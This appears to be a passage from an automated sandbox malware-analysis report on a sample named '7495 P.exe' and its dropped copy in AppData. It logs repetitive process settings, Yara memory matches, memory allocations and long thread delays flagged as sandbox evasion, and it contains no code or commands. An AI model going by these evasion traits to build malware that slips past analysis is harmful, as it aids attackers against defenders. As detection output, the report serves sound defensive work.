                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\7495 P.exeMemory allocated: 1190000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeMemory allocated: 2E80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeMemory allocated: 8630000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeMemory allocated: 9630000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeMemory allocated: 9810000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeMemory allocated: A810000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeMemory allocated: 3280000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeMemory allocated: 5280000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeMemory allocated: 890000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeMemory allocated: 2530000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeMemory allocated: 2340000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeMemory allocated: 7820000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeMemory allocated: 8820000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeMemory allocated: 89F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeMemory allocated: 99F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeMemory allocated: 1760000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeMemory allocated: 3110000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeMemory allocated: 5110000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599858Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599737Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599590Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599474Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599238Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599111Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598974Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598833Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598709Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598571Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598449Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598315Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598190Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598049Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597896Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597747Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597626Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597505Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597381Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597243Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597142Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597011Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596895Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596757Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596641Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596510Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596410Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596278Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596152Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596041Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595925Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595793Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595693Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595446Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595321Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595207Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595045Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594904Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594730Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594624Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594522Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594411Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594280Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594164Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594064Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 593926Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 593794Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 593678Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 593547Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599877
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599761
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599645
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599531
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599399
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599283
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599167
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599045
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 598929
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 598828
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 598542
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 598424
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 598250
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 598036
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597917
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597801
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597685
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597569
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597469
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597347
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597231
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597115
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596999
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596883
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596767
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596644
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596529
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596413
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596307
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596196
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596081
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 595938
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 595766
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 595351
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 595033
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 594909
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 594787
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 594659
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 594534
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 594409
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 593378
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 593253
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 593128
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 592944
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 592708
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 592456
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 592170
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 592025
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 591914
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 591799
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 591675
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 591564
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9098Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 611Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9046Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 600Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeWindow / User API: threadDelayed 5257Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeWindow / User API: threadDelayed 4552Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeWindow / User API: threadDelayed 3492
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeWindow / User API: threadDelayed 6334
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 6788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8624Thread sleep count: 9098 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8604Thread sleep count: 611 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8820Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8848Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep count: 37 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8996Thread sleep count: 5257 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -599858s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8996Thread sleep count: 4552 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -599737s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -599590s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -599474s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -599343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -599238s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -599111s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -598974s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -598833s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -598709s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -598571s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -598449s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -598315s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -598190s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -598049s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -597896s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -597747s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -597626s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -597505s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -597381s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -597243s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -597142s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -597011s >= -30000sJump to behavior
